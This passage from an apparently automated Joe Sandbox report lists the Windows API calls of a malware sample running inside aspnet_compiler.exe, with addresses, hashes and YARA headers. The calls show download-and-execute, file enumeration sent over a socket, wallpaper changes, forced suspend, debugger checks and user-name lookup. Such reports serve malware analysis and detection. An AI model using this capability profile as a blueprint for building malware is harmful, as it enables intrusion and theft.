                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                          • String ID: PowrProf.dll$SetSuspendState
                                                                          • API String ID: 1589313981-1420736420
                                                                          • Opcode ID: dbe2315887bba6ce4f894fc1155da3ca588fd34dbc6ce905beef225a72b0054e
                                                                          • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                          • Opcode Fuzzy Hash: dbe2315887bba6ce4f894fc1155da3ca588fd34dbc6ce905beef225a72b0054e
                                                                          • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                          APIs
                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                          • GetACP.KERNEL32 ref: 004512BA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID: ACP$OCP
                                                                          • API String ID: 2299586839-711371036
                                                                          • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                          • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                          • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                          • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                          • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                          • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                          • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID: SETTINGS
                                                                          • API String ID: 3473537107-594951305
                                                                          • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                          • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                          • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                          • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                          • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                          • String ID:
                                                                          • API String ID: 745075371-0
                                                                          • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                          • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                          • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                          • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00407A91
                                                                          • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstH_prologNext
                                                                          • String ID:
                                                                          • API String ID: 1157919129-0
                                                                          • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                          • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                          • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                          • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                          APIs
                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: DownloadExecuteFileShell
                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                                                                          • API String ID: 2825088817-4294605632
                                                                          • Opcode ID: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                          • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                          • Opcode Fuzzy Hash: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                          • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$FirstNextsend
                                                                          • String ID: x@G$x@G
                                                                          • API String ID: 4113138495-3390264752
                                                                          • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                          • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                          • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                          • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                            • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                            • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                            • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                          • API String ID: 4127273184-3576401099
                                                                          • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                          • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                          • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                          • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                          APIs
                                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                            • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                            • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                            • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                          • API String ID: 4127273184-3576401099
                                                                          • Opcode ID: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                          • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                          • Opcode Fuzzy Hash: 71d1e5c445f68871914c285a29d0046b246b6ade461d972b8fac6679235b0182
                                                                          • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                          • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                          • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                          • String ID:
                                                                          • API String ID: 4212172061-0
                                                                          • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                          • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                          • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                          • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 00408DAC
                                                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFind$FirstH_prologNext
                                                                          • String ID:
                                                                          • API String ID: 301083792-0
                                                                          • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                          • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                          • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                          • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00448067
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                          • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                          • String ID:
                                                                          • API String ID: 806657224-0
                                                                          • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                          • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                          • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                          • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                                          • String ID:
                                                                          • API String ID: 2829624132-0
                                                                          • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                          • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                          • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                          • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                          • String ID:
                                                                          • API String ID: 3906539128-0
                                                                          • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                          • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                          • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                          • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                          APIs
                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                          • String ID:
                                                                          • API String ID: 1815803762-0
                                                                          • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                          • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                          • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                          • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                          APIs
                                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID: GetLocaleInfoEx
                                                                          • API String ID: 2299586839-2904428671
                                                                          • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                                          • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                          • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                                          • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                                          • String ID:
                                                                          • API String ID: 1663032902-0
                                                                          • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                          • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                          • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                          • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                          • EnumSystemLocalesW.KERNEL32(00450E6A,00000001), ref: 00450DB4
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                          • String ID:
                                                                          • API String ID: 1084509184-0
                                                                          • Opcode ID: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                          • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                          • Opcode Fuzzy Hash: 9d28c5e255c7ff7bf8c29f4c99fb410e4ec57aee4c7c61eda1ee1a9008b30fc6
                                                                          • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                                          • String ID:
                                                                          • API String ID: 2692324296-0
                                                                          • Opcode ID: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                          • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                          • Opcode Fuzzy Hash: de3708e636430d7d6226d88625fb8e837b1d84cd9ebb77ae463e34ca348812de
                                                                          • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                          APIs
                                                                            • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                            • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                            • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                            • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                          • EnumSystemLocalesW.KERNEL32(004510BA,00000001), ref: 00450E29
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                          • String ID:
                                                                          • API String ID: 1084509184-0
                                                                          • Opcode ID: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                          • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                          • Opcode Fuzzy Hash: 39b6845edf5822fb0cb5ec1b15846e624abd352d664abc6135ad0e1aa048f885
                                                                          • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
